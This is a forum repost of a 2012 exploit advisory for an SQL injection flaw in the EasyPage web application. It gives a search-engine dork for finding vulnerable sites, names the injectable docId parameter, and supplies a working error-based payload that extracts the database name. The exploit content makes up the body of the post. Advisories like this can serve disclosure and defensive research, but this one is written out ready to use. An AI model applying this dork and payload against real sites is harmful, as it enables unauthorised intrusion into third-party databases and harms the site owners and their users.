Jump to content
The_Arhitect

EasyPage SQL Injection Vulnerability

Recommended Posts

Posted

EasyPage SQL Injection Vulnerability

# 
# Title : EasyPage SQL Injection Vulnerability
# Author : Red Security TEAM
# Date : 19/01/2012
# Risk : High
# Vendor : http://karait.com/
# Tested On : Windows Server 2008 (Microsoft-IIS/7.5)
# Dork : inurl:default.aspx?page=Document&app=Documents&docId=*
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
# http://server/default.aspx?page=Document&app=Documents&docId=[SQLi]
#
# Example :
#
# [Get Database Name]
# http://server/default.aspx?page=Document&app=Documents&docId=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1
#

Sursa: EasyPage SQL Injection Vulnerability

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...